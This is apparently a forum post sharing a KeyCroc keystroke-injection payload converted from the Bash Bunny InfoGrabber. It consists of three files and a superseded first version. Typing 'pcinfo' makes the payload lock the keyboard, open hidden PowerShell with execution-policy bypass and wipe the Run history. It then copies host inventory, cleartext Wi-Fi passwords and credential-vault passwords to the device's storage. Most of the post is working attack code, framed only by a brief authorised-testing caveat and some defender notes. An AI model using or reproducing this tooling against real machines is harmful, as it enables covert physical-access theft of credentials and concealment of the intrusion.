spywill

Bashbunny payload into KeyCroc payload


This is the Bash Bunny InfoGrabber payload (https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber) converted into a KeyCroc payload.

The converted payload works on the KeyCroc.

Place all three files in the payloads folder on the KeyCroc, then type pcinfo on the target's keyboard; the collected output is saved to the loot/info folder on the KeyCroc's USB storage. Be aware that the loot file contains Wi-Fi PSKs and credential-vault passwords in cleartext (info.ps1 runs netsh wlan ... key=clear and reads the PasswordVault), so only run this against machines you are authorised to test and wipe loot/info once the engagement is over.

 

 

 

The three files: info.ps1, payload.txt, run.ps1

 

payload.txt 

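# payload.txt - KeyCroc trigger. When the word "pcinfo" is typed on the target
# keyboard, expose the Croc's USB storage to the target and start
# payloads\run.ps1 from it in a hidden PowerShell. run.ps1 / info.ps1 write
# the inventory (including Wi-Fi PSKs and credential-vault secrets) to
# loot\info on the Croc. Authorised engagements only.
MATCH pcinfo
# Hold the physical keyboard while we type so the user cannot interfere.
QUACK LOCK
# HID STORAGE also presents the udisk to the target; give the OS time to mount it
# before anything tries to read from it.
ATTACKMODE HID STORAGE
QUACK DELAY 5000
# Show the desktop first so a full-screen application does not swallow the Run dialog.
QUACK GUI d
QUACK GUI r
QUACK DELAY 500
# -nop: no profile, -ex Bypass: ignore execution policy, -w Hidden: no visible console.
# NOTE(review): this exact command line is what process-creation logging
# (4688 / Sysmon) records on the target.
QUACK STRING "powershell -nop -ex Bypass -w Hidden"
QUACK ENTER
# Let powershell.exe come up before typing into it.
QUACK DELAY 1000
# Find the Croc by volume label (not by drive letter, which varies per host) and
# dot-source run.ps1 from it. If the volume is not mounted yet, .Name is $null and
# the call fails without any visible error.
QUACK STRING ".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'payloads\run.ps1')"
QUACK ENTER
# Release the keyboard lock taken above once typing is finished; the original never
# did, leaving the physical keyboard locked after the payload ran.
QUACK UNLOCK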

run.ps1

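# run.ps1 - launcher, dot-sourced from the KeyCroc trigger (payload.txt).
# Finds the Croc's USB storage by volume label, creates loot\info on it and
# runs info.ps1 with stdout redirected into a timestamped file there.
# info.ps1 writes Wi-Fi PSKs and credential-vault secrets in cleartext, so the
# loot file has to be handled (and wiped) as sensitive material.

#Remove run history
# '*' wipes every RunMRU entry (and the MRUList), not only the one we created.
# Runs in-process; the original spawned a second powershell.exe for this one cmdlet.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

#Get the path and file name that you are using for output
# find connected KeyCroc drive by volume label rather than by drive letter:
$VolumeName = "KeyCroc"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
Get-WmiObject win32_logicaldisk | % {
    if ($_.VolumeName -eq $VolumeName) {
        $backupDrive = $_.DeviceID
    }
}

# Stop if the Croc's volume was not found. Without this guard $backupDrive is
# empty, "\loot" resolves against the TARGET's current drive and the loot (and
# the evidence) ends up on the victim machine instead of on the Croc.
if (-not $backupDrive) {
    return
}

#See if a loot folder exist in usb. If not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR | Out-Null
}

#See if a info folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\info"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR | Out-Null
}

#Create a path that will be used to make the file: <hostname> - <yyyy-MM-dd_HH-mm>.txt
$datetime = get-date -f yyyy-MM-dd_HH-mm
$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"

#Create output from info script
# info.ps1 sits next to this script; take our own folder from the script path
# instead of chopping a fixed number of characters ("run.ps1") off the end.
$TARGETDIR = Split-Path -Parent $MyInvocation.MyCommand.Path
cd $TARGETDIR
# Separate process so info.ps1's Clear-Host / Remove-Variable do not touch this
# session; stdout goes to the loot file, errors still go to the (hidden) console.
PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath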

 

info.ps1

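# info.ps1 - host inventory collector: hardware, OS, network, local users,
# processes, listeners, services, software, drivers, Wi-Fi profiles with PSKs
# and the current user's credential-vault entries. Everything is written to
# stdout; run.ps1 redirects stdout into the loot file.
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
#
# Runs in the calling user's context (no admin needed); the vault section
# therefore only sees that user's stored web credentials. The output contains
# Wi-Fi PSKs and vault passwords in cleartext - handle the loot file as
# sensitive material. From a defender's view this is noisy: one outbound HTTP
# request to ipinfo.io, "netsh wlan show profiles ... key=clear" and
# PasswordVault.RetrievePassword() are all well-known collection patterns.

#Get info about pc

# Get IP / Nework Info
# The only network traffic this script generates. -TimeoutSec bounds the wait:
# Invoke-WebRequest's default (0) waits indefinitely, so on a host whose egress
# is silently dropped the original stalled the whole collection on this line.
try
{
$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing -TimeoutSec 10).Content
}
catch
{
$computerPubIP = "Error getting Public IP"
}
# Adapters that actually carry an address; only the first IP is printed below.
$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
$IsDHCPEnabled = $False
$Networks =  Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $True
  }
# Overwritten on every pass: only the last DHCP-enabled adapter's MAC is kept.
[string[]]$computerMAC = $Network.MACAddress
}

#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement

# WMI date fields are DMTF strings; ConvertToDateTime turns them into DateTime.
$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory  | Format-List
$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List

$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table

# Get HDDs
$driveType = @{
   2="Removable disk "
   3="Fixed local disk "
   4="Network disk "
   5="Compact disk "}
# FreeSpace % is guarded: the original computed 100 / (Size / FreeSpace), which
# divides by zero on a full volume (FreeSpace 0) or a drive without media
# (empty Size, e.g. a CD-ROM drive) and raised an error for that row.
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={ if ($_.Size) { "{0:N1}%" -f (100 * $_.FreeSpace / $_.Size) } else { "n/a" } }} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }

#Get - Com & Serial Devices
# Every device hanging off a USB controller (Win32_USBControllerDevice.Dependent).
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table

# Check RDP
# fDenyTSConnections = 0 means Remote Desktop is allowed in the registry; the
# firewall rule is not checked. (The original had a stray bare "$RDP" here.)
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { 
    $RDP = "RDP is Enabled" 
} else {
    $RDP = "RDP is NOT Enabled" 
}

# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 

# Get wifi SSIDs and Passwords
# Parses netsh's English output; the "Key Content" label differs on localised
# Windows, where this section would come up empty.
$WLANProfileNames = @()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern ":"
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
    # Split on the first ":" only so an SSID that itself contains ":" is kept whole.
    $profileName = (($WLANProfileName.Line -split ":", 2)[1]).Trim()
    # Header lines such as "Profiles on interface Wi-Fi:" also match ":" but carry
    # no name; the original pushed "" and later asked netsh for an empty profile.
    if ($profileName) {
        $WLANProfileNames += $profileName
    }
}
$WLANProfileObjects = @()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
    #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
    # key=clear prints the PSK in cleartext. Open networks have no "Key Content"
    # line, so [1]/Trim() run on $null, throw, and the catch supplies the text.
    try{
        $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
    } Catch {
        $WLANProfilePassword = "The password is not stored in this profile"
    }
    #Build the object and add this to an array
    $WLANProfileObject = New-Object PSCustomobject 
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
    $WLANProfileObjects += $WLANProfileObject
    Remove-Variable WLANProfileObject
}

# local-user
# NOTE(review): Win32_UserAccount also enumerates domain accounts and can be slow
# on domain-joined hosts - confirm before using on a large domain.
$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID

# process first
# Kept as plain objects here because the listener join below needs .Handle (PID).
$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine

# Get Listeners / ActiveTcpConnections
# Get-NetTCPConnection needs the NetTCPIP module (Windows 8 / Server 2012 or later).
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
    $listenerItem = $_
    # Join each connection to its owning process by PID so a name can be shown.
    $processItem = ($process | where { [int]$_.Handle -eq [int]$listenerItem.OwningProcess })
    new-object PSObject -property @{
      "LocalAddress" = $listenerItem.LocalAddress
      "RemoteAddress" = $listenerItem.RemoteAddress
      "State" = $listenerItem.State
      "AppliedSetting" = $listenerItem.AppliedSetting
      "OwningProcess" = $listenerItem.OwningProcess
      "ProcessName" = $processItem.ProcessName
    }
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table 

# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine

# service
$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName

# installed software (get uninstaller)
# Only HKLM\...\Uninstall is read; entries under WOW6432Node or HKCU are not listed.
$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } |  Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize

# drivers
$drivers = Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion

# videocard
$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution

#Get stored passwords
# Windows.Security.Credentials.PasswordVault (WinRT) is the current user's
# "Web Credentials" store; RetrievePassword() fills .Password in cleartext.
# It is not the whole Credential Manager, and the type is unavailable outside
# Windows PowerShell on Windows.
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault 
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

#The output
# Bare expressions below go to stdout (the loot file when run via run.ps1).
# Clear-Host / Write-Host talk to the console host, not stdout.
Clear-Host
Write-Host 

$computerSystem.Name
"=================================================================="
"Manufacturer: " + $computerSystem.Manufacturer
"Model: " + $computerSystem.Model
"Serial Number: " + $computerBIOS.SerialNumber
""
""
""

"OS:"
"=================================================================="+ ($computerOs | out-string)

"CPU:"
"=================================================================="+ ($computerCpu | out-string)

"RAM:"
"=================================================================="
"Capacity: " + $computerRamCapacity+ ($computerRam | out-string)

"Mainboard:"
"=================================================================="+ ($computerMainboard | out-string)

"Bios:"
"=================================================================="+ (Get-WmiObject win32_bios | out-string)


"Local-user:"
"=================================================================="+ ($luser | out-string)

"HDDs:"
"=================================================================="+ ($Hdds | out-string)

"COM & SERIAL DEVICES:"
"=================================================================="+ ($COMDevices | Out-String)

"Network:"
"=================================================================="
"Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP  
"RDP: " + $RDP
""
($Network | out-string)

"W-Lan profiles:"
"=================================================================="+ ($WLANProfileObjects | out-string)

"listeners / ActiveTcpConnections:"
"=================================================================="+ ($listener | out-string)

"Current running process:"
"=================================================================="+ ($process | out-string)

"Services:"
"=================================================================="+ ($service | out-string)

"Installed software:"
"=================================================================="+ ($software | out-string)

"Installed drivers:"
"=================================================================="+ ($drivers | out-string)

"Installed videocards:"
"=================================================================="+ ($videocard | out-string)

# Heading kept as-is for existing loot; the content is the current user's
# PasswordVault (web credentials), see above - not Windows logon passwords.
"Windows/user passwords:"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

# Drop the collected secrets from the session (the original listed "process" twice).
Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks, 
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,profileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force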

 

This was my first attempt; it does not save the output to the loot folder (kept here for reference only, superseded by the three-file version above).

 

# First attempt (superseded by the three-file version above; kept for reference).
# Instead of dot-sourcing run.ps1 from the Croc, this types the contents of
# run.ps1 and info.ps1 into an interactive PowerShell console keystroke by
# keystroke. Why nothing ends up in loot\info:
#   - $MyInvocation.MyCommand.Path is only populated while a script file is
#     running; typed at the prompt there is no script file, so $TARGETDIR is
#     empty and the "cd" below has nothing to change to.
#   - the one statement that redirected output into $backupPath (the
#     "-File info.ps1 > $backupPath" call) is commented out, and the inventory
#     that follows is simply printed to the console.
#   - the console is started as plain "powershell" (no -w Hidden) and there is no
#     QUACK LOCK, so the whole typing session is visible and interruptible.
MATCH pcinfo
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
QUACK GUI d
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER 
QUACK DELAY 1000
# --> Remove run history
QUACK STRING "\"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
QUACK ENTER
QUACK DELAY 1000
# --> Get the path and file name that you are using for output
# --> find connected KeyCroc drive:
# (payload.txt is interpreted by bash on the Croc, hence the \$ and \" escapes.)
QUACK STRING "\$VolumeName = \"KeyCroc\""
QUACK ENTER
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$backupDrive = \$null"
QUACK ENTER
QUACK STRING "get-wmiobject win32_logicaldisk | % {"
QUACK ENTER
QUACK STRING "if (\$_.VolumeName -eq \$VolumeName) {"
QUACK ENTER
QUACK STRING "\$backupDrive = \$_.DeviceID"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> See if a loot folder exist in keycroc. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> See if a info folder exist in loot folder. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\info\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> Create a path that will be used to make the file
QUACK STRING "\$datetime = get-date -f yyyy-MM-dd_HH-mm"
QUACK ENTER
QUACK STRING "\$backupPath = \$backupDrive + \"\loot\info\" + \$computerSystem.Name + \" - \" + \$datetime + \".txt\""
QUACK ENTER
QUACK DELAY 1000
# --> Create output from info script
# At an interactive prompt there is no script file, so this path is empty and the
# "cd" three lines down cannot work.
QUACK STRING "\$TARGETDIR = \$MyInvocation.MyCommand.Path"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$TARGETDIR = \$TARGETDIR -replace \".......\$\""
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "cd \$TARGETDIR"
QUACK ENTER
# The only statement that would write to $backupPath is disabled below, which is
# why this version never produces a loot file.
#QUACK STRING "PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > \$backupPath"
QUACK ENTER
QUACK DELAY 1000
# --> Shows details of currently running PC
# --> Get info about pc
# --> Get IP / Nework Info
# Everything from here on is info.ps1 typed line by line; its output goes to the
# console, not to $backupPath.
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = \"Error getting Public IP\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {\$_.Ipaddress.length -gt 1}"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$False"
QUACK ENTER
QUACK STRING "\$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"DHCPEnabled=\$True\" | ? {\$_.IPEnabled}"
QUACK ENTER
QUACK STRING "foreach (\$Network in \$Networks) {"
QUACK ENTER
QUACK STRING "If(\$network.DHCPEnabled) {"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$True"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "[string[]]\$computerMAC = \$Network.MACAddress"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> Get System Info
QUACK DELAY 1000
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK STRING "\$computerBIOS = Get-CimInstance CIM_BIOSElement"
QUACK ENTER
QUACK STRING "\$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name=\"InstallDate\";Expression={([WMI]'').ConvertToDateTime(\$_.InstallDate)}} , @{Name=\"LastBootUpTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LastBootUpTime)}}, @{Name=\"LocalDateTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory  | Format-List"
QUACK ENTER
QUACK STRING "\$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List"
QUACK ENTER
QUACK STRING "\$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List"
QUACK ENTER
QUACK STRING "\$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f (\$_.sum / 1GB)}"
QUACK ENTER
QUACK STRING "\$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f (\$_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table"
QUACK ENTER
# --> Get HDDs
QUACK DELAY 1000
QUACK STRING "\$driveType = @{"
QUACK ENTER
QUACK STRING "2=\"Removable disk\""
QUACK ENTER
QUACK STRING "3=\"Fixed local disk\""
QUACK ENTER
QUACK STRING "4=\"Network disk\""
QUACK ENTER
QUACK STRING "5=\"Compact disk\"}"
QUACK ENTER
QUACK STRING "\$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={\$driveType.item([int]\$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f (\$_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f (\$_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / (\$_.Size / \$_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber, @{ Name=\"Size GB\"; Expression={\$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={\$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={\$_.FreeSpace_percent}; align=\"right\"; }"
QUACK ENTER
# --> Get - Com & Serial Devices
QUACK DELAY 1000
QUACK STRING "\$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi](\$_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table"
QUACK ENTER
# --> Check RDP
QUACK STRING "\$RDP"
QUACK DELAY 1000
QUACK ENTER
QUACK STRING "if ((Get-ItemProperty \"hklm:\System\CurrentControlSet\Control\Terminal Server\").fDenyTSConnections -eq 0) {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is Enabled\""
QUACK ENTER 
QUACK STRING "} else {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is NOT Enabled\""
QUACK ENTER 
QUACK STRING "}"
QUACK ENTER
# --> Get Network Interfaces
QUACK DELAY 1000
QUACK STRING "\$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { \$_.MACAddress -notlike \$null }  | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress" 
QUACK ENTER
# --> Get wifi SSIDs and Passwords
# key=clear below prints stored Wi-Fi PSKs in cleartext on the (visible) console.
QUACK DELAY 1000    
QUACK STRING "\$WLANProfileNames = @()"
QUACK ENTER
# --> Get all the WLAN profile names
QUACK DELAY 1000
QUACK STRING "\$Output = netsh.exe wlan show profiles | Select-String -pattern \":\""
QUACK ENTER
# --> Trim the output to receive only the name
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$Output){"
QUACK ENTER
QUACK STRING "\$WLANProfileNames += ((\$WLANProfileName -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects = @()"
QUACK ENTER
# -->  Bind the WLAN profile names and also the password to a custom object
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$WLANProfileNames){"
QUACK ENTER
# --> get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = (((netsh.exe wlan show profiles name=\"\$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}" 
QUACK ENTER
QUACK STRING "Catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = \"The password is not stored in this profile\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 2000
# --> Build the object and add this to an array
QUACK STRING "\$WLANProfileObject = New-Object PSCustomobject"
QUACK ENTER 
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value \$WLANProfileName"
QUACK ENTER
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value \$WLANProfilePassword"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects += \$WLANProfileObject"
QUACK ENTER
QUACK STRING "Remove-Variable WLANProfileObject"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> local-user
QUACK DELAY 1000
QUACK STRING "\$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID"
QUACK ENTER
# --> process first
QUACK DELAY 1000
QUACK STRING "\$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> Get Listeners / ActiveTcpConnections
QUACK DELAY 1000
QUACK STRING "\$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={\$_.LocalAddress + \":\" + \$_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={\$_.RemoteAddress + \":\" + \$_.RemotePort}}, State, AppliedSetting, OwningProcess"
QUACK ENTER
QUACK STRING "\$listener = \$listener | foreach-object {"
QUACK ENTER
QUACK STRING "\$listenerItem = \$_"
QUACK ENTER
QUACK STRING "\$processItem = (\$process | where { [int]\$_.Handle -like [int]\$listenerItem.OwningProcess })"
QUACK ENTER
QUACK STRING "new-object PSObject -property @{"
QUACK ENTER
QUACK STRING "\"LocalAddress\" = \$listenerItem.LocalAddress"
QUACK ENTER
QUACK STRING "\"RemoteAddress\" = \$listenerItem.RemoteAddress"
QUACK ENTER
QUACK STRING "\"State\" = \$listenerItem.State"
QUACK ENTER
QUACK STRING "\"AppliedSetting\" = \$listenerItem.AppliedSetting"
QUACK ENTER
QUACK STRING "\"OwningProcess\" = \$listenerItem.OwningProcess"
QUACK ENTER
QUACK STRING "\"ProcessName\" = \$processItem.ProcessName"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table" 
QUACK ENTER
# --> process last
QUACK DELAY 1000
QUACK STRING "\$process = \$process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> service
QUACK DELAY 1000
QUACK STRING "\$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={\$_.State + \$_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName"
QUACK ENTER
# --> installed software (get uninstaller)
QUACK DELAY 1000
QUACK STRING "\$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { \$_.DisplayName -notlike \$null } |  Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize"
QUACK ENTER
# --> drivers
QUACK DELAY 1000
QUACK STRING "\$drivers = Get-WmiObject Win32_PnPSignedDriver | where { \$_.DeviceName -notlike \$null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion"
QUACK ENTER
# --> videocard
QUACK DELAY 1000
QUACK STRING "\$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution"
QUACK ENTER
# --> Get stored passwords
# PasswordVault = the current user's "Web Credentials"; RetrievePassword() gives cleartext.
QUACK DELAY 1000
QUACK STRING "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]"
QUACK ENTER
QUACK STRING "\$vault = New-Object Windows.Security.Credentials.PasswordVault" 
QUACK ENTER
QUACK STRING "\$vault = \$vault.RetrieveAll() | % { \$_.RetrievePassword();\$_ }"
QUACK ENTER
# --> The output
# Printed to the console only; nothing below redirects into $backupPath.
QUACK DELAY 2000
QUACK STRING "Clear-Host"
QUACK ENTER
QUACK STRING "Write-Host"
QUACK ENTER 
QUACK DELAY 2000
QUACK STRING "\$computerSystem.Name"
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Manufacturer: \" + \$computerSystem.Manufacturer"
QUACK ENTER
QUACK STRING "\"Model: \" + \$computerSystem.Model"
QUACK ENTER
QUACK STRING "\"Serial Number: \" + \$computerBIOS.SerialNumber"
